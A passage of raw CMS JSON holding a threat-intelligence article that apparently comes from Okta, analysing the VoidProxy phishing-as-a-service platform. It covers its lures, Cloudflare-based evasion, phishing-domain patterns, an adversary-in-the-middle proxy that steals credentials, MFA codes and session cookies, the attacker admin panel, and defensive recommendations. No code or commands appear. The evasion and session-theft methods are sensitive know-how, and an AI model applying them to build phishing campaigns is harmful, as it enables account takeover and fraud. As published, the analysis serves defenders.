Binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - May 12, 
2023\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Article Published\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2025-09-16T19:55:25.636Z","secAuthor":[{"id":"e0099522-136e-5003-b6a5-f4499896bf19","bio":{"bio":"<p>Brett Winterford is Vice President of Okta Threat Intelligence.  Okta Threat Intelligence delivers timely, highly relevant and actionable insights about the threat environment, with a focus on identity-based threats.  Brett was previously the regional Chief Security Officer for Okta in the Asia Pacific and Japan, and advised business and technology leaders in the region on all things identity. </br> Prior to Okta, Brett held a senior security leadership role at Symantec, and helmed security research, awareness and education at Commonwealth Bank.  
Brett is also an award-winning journalist, editor-in-chief of iTnews Australia and a contributor to the Risky Business podcast and newsletter, to ZDNet, the Australian Financial Review and the Sydney Morning Herald.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/5cVIStynit3itWxHA4pv8S/8e8e647b20b34abcaff72ee837cb797c/Brett_20Resized.jpg"},"name":"Brett Winterford","jobTitle":"VP, Okta Threat Intelligence","slug":"brett-winterford","node_locale":"en"},{"id":"2d0612d0-ea24-5a48-bed3-797e6306eea4","bio":{"bio":""},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/1uHU5vrZGhUcNFNAzgylU2/e92b96b2d85e5fb3c5da8a2c1695ddc9/md_profile.png"},"name":"Moussa Diallo","jobTitle":"Sr Manager, Identity Threat Research","slug":"moussa-diallo","node_locale":"en"}]},{"slug":"/articles/uncloakingvoidproxy","id":"a77a5e93-beab-5b8b-998d-c33343b6b9e4","title":"Uncloaking VoidProxy: a Novel and Evasive Phishing-as-a-Service Framework","date":"2025-09-11T00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Threat Intelligence has published a detailed analysis on a previously unreported Phishing-as-a-Service (PhaaS) operation, which its authors name \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"VoidProxy\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\".\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VoidProxy is a novel and highly evasive service used by attackers to target Microsoft and Google accounts. The service is also capable of redirecting accounts protected by third-party single sign-on (SSO) providers like Okta to second-stage phishing pages. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VoidProxy represents a mature, scalable and evasive threat to traditional email security and authentication controls. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The service uses Adversary-in-the-Middle (AitM) techniques to intercept authentication flows in real-time, capturing credentials, MFA codes and any session tokens established during the sign-in event. This capability can bypass the protection of several common MFA methods, such as SMS codes and one-time passwords (OTP) from authenticator apps.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By offering this sophisticated PhaaS, VoidProxy lowers the technical barrier for a wide range of threat actors to execute AitM phishing attacks. Accounts compromised using PhaaS platforms facilitate numerous malicious activities such as Business Email Compromise (BEC), financial fraud, data exfiltration and lateral movement within victim networks.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In all attacks we observed, users enrolled in phishing-resistant authenticators (in this case, Okta FastPass) were unable to share credentials or sign-in via VoidProxy infrastructure, and were warned that their account was under attack.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The VoidProxy platform has been able to evade analysis until this point by using multiple layers of anti-analysis features, including compromised email accounts, multiple redirects, Cloudflare CAPTCHA challenges, Cloudflare Workers and dynamic DNS services. 
Our understanding of VoidProxy arose from Okta’s unique ability to detect and alert on phishing attacks in customer environments where FastPass is used, as well as the dedicated work of our threat analysis and research team. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Below, we summarize each anti-analysis technique, analyze the attacker’s infrastructure, and offer recommendations to defend against this threat. A \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/uncloaking-voidproxy-phaas-framework\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"complete threat advisory\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", available to Okta customers at \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://security.okta.com/product/okta/uncloaking-voidproxy-phaas-framework\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"security.okta.com\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", also includes:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An in-depth, 20-page analysis of VoidProxy PhaaS infrastructure\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A peek inside the attacker’s admin panel\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Indicators of Compromise that identify threat actors known to be using the service. 
These indicators have been uploaded to Identity Threat Protection, a service that enables Okta customers to take in-line responses to user interactions with this infrastructure. \",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A VoidProxy attack, step-by-step\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage 1: Delivery and lure\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the first phase of attacks we observed, phishing lures were sent from compromised accounts of legitimate Email Service Providers (ESPs) such as Constant Contact, Active Campaign (Postmarkapp), NotifyVisitors, and others, leveraging the reputation of these accounts to bypass spam filters.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Embedded in each phishing email were links to URL shortening services (such as TinyURL), which would each be redirected a number of times before the user is directed to first-stage landing sites in order to evade automated analysis.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5N67hYr5CYWtdJabKPPzHn\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 1. URLscan data showing the redirects from a tinyurl link to the phishing domain\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These first-stage phishing pages are hosted on domains registered with a variety of low-cost, low-reputation TLDs, such as .icu, .sbs, .cfd, .xyz, .top, and .home. 
This strategy minimizes operational costs and allows the attackers to treat the domains as disposable assets, quickly abandoning them once they are identified and blocklisted. The phishing sites are placed behind Cloudflare, effectively hiding the real IP address of the phishing site's server and making it much harder for security teams to trace and take down the malicious host.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage 2: Evasion and lure loading\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Before any first-stage landing sites load, the user is presented with a Cloudflare CAPTCHA challenge to determine if the request is from an interactive user or a bot.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"5J57QOckBsKqXbu88FViQC\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 2. Cloudflare CAPTCHA challenges presented on a phishing domain\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The targeted user’s browser then communicates with a Cloudflare Worker (\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"*.workers.dev\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"). We assess that this worker is likely to act as a gatekeeper and lure loader. Its primary functions are to filter incoming traffic and to load the appropriate phishing page for any given target. This architecture separates initial filtering from the core phishing operations of the campaign. Once a challenge is passed, the user is presented with a phishing page, which is a perfect replica of a legitimate login portal. 
\\n\\nFirst-stage phishing sites follow a consistent domain registration pattern, as described in the captions below:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"3Co59Y6nNpjeVG8dFq7zKt\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 3. Domain pattern for Microsoft phishing pages: \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"login.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6S6osTmRFnnIl49wrSLu3E\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 4.  Domain pattern for Google phishing pages: \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"accounts.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"\\n\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Any attempt to access the site using automated scanners or other security tools redirects the user to a generic “welcome” page with no further functionality.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2lN1mNS1kZKunGZvzkWGzP\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 5. 
Phishing domain showing “Welcome!” page\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage 3: Second stage landing pages\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"After a targeted user enters their primary Microsoft or Google credentials on the phishing page, the data is sent to VoidProxy’s core AitM proxy server. It’s here that the sophisticated, multi-layered nature of VoidProxy comes into play.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Federated users are redirected to additional second-stage landing pages after providing primary  credentials for their Microsoft or Google account. Non-federated users are redirected to Microsoft and Google servers directly via the proxy infrastructure.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"table\",\"data\":{},\"content\":[{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Targeted User Account\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"First-Stage Phishing Page\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Second-Stage Phishing Page\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Requests Proxied 
To:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Local Microsoft account\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Landing page impersonates Microsoft at:\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"login.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"None\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft servers\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Local Google account\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Landing page impersonates Google at: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"accounts.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"None\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google 
servers\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft account federated to Okta for SSO\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Landing page impersonates Microsoft at:\\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"login.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Landing page impersonates an Office 365 SP-initiated flow with Okta at: \\n\",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"newnewdom<randomstring>.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta servers\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Google account federated to Okta for SSO\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Landing page impersonates Google at: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"accounts.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Landing page impersonates a Google SP-initiated 
flow with Okta at: \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"securedauthxx<randomstring>.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]}]},{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta servers\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 6. VoidProxy redirects to a mix of first and second stage landing pages depending on account configuration.\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6xarxmOR5NRZUQ9sxBK7re\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 7. Domain pattern for second-stage Microsoft phishing pages: \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"newnewdom<randomstring>.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6fFn4I3x01YusIB3uityLr\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 8. 
Domain pattern for second-stage Google phishing pages: \",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"securedauthxx<randomstring>.<phishing_domain>.<tld>\",\"marks\":[{\"type\":\"italic\"},{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"heading-4\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Stage 4: AitM relay and session hijacking\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"In the next stage of the phishing attack, a core proxy server hosted on ephemeral infrastructure executes an AitM attack. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The server acts as a reverse proxy to capture and relay information — including usernames, passwords, and MFA responses — to legitimate services like Microsoft, Google, and Okta. When the legitimate service validates the authentication and issues a session cookie, the VoidProxy proxy server intercepts it. A copy of the cookie is exfiltrated and made available to the attacker via their admin panel. 
The attacker is now in possession of a valid session cookie and can access the victim's account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VoidProxy infrastructure\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\\nThe operational infrastructure of VoidProxy is a combination of disposable, high-turnover frontends and a more persistent, resilient backend hosted on serverless architecture.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Our threat advisory contains a detailed analysis of the naming patterns of both page domains and Cloudflare Worker endpoints, all of which strongly suggest an automated or semi-automated provisioning system for customers of the Phishing-as-a-Service platform (threat actors who rent access to it) that provides both a layer of isolation between these customers and another form of obfuscation that (until now) made it difficult for researchers to link all activity to a single controlling entity. \",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The core of VoidProxy's operation is hosted on servers accessed via dynamic DNS wildcard services \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"sslip[.]io\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"text\",\"value\":\"nip[.]io\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\". These services are designed to resolve hostnames with embedded IP addresses directly to those IPs. 
\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This ephemeral infrastructure is used to host:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The VoidProxy AitM proxy engine: the server that performs the actual adversary-in-the-middle attack, relaying traffic between the victim and the legitimate service to steal session cookies.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The attackers’ admin panel: the hosting of a web panel that PhaaS customers use to configure campaigns, monitor victims in real-time and access stolen data.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"VoidProxy offers a full-featured administrative panel that allows PhaaS customers to manage and monitor their campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"aNzjR2ZL0BdYr1Www6lKE\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 9. 
VoidProxy admin login page\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once a user logs in, they have access to numerous pages for campaign management including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An account-level dashboard (see image below)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An account-level settings page (see image below)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A campaign management page\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"A dashboard for each campaign\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2rDejtKmnQE3ztsbEJZZMf\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 10. VoidProxy admin panel dashboard\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2Ov9rSfBvS3YT15Mn4Rczh\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Figure 11. 
VoidProxy admin panel settings\",\"marks\":[{\"type\":\"italic\"}],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"These pages provide a view of what target services can be impersonated using the kit, how stolen secrets are extracted (via manual downloads or real-time notifications via Telegram Bot Tokens or Webhook URLs), and what other third party tools can be integrated into phishing operations.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Recommendations\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Enroll users in strong authenticators such as Okta FastPass, FIDO2 WebAuthn (passkeys and security keys), and smart cards and enforce phishing-resistance in policy. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Restrict access to sensitive applications to devices that are \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/managed-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"managed\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" by Endpoint Management tools and \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/edr-integration-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"protected by endpoint security tools\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". 
For access to less sensitive applications, require \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"registered\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" devices that \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/Content/Topics/identity-engine/devices/device-assurance.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"exhibit indicators of basic hygiene\",\"marks\":[{\"type\":\"underline\"}],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\". \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Deny or require higher assurance for requests from rarely-used networks. \",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Identify requests for access to applications that deviate from previously established patterns of user activity (for example, using Okta Behavior and Risk evaluations). Policies can be configured to step-up or deny requests using this context.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Train users to identify indicators of suspicious emails, phishing sites and common social engineering techniques used by attackers. 
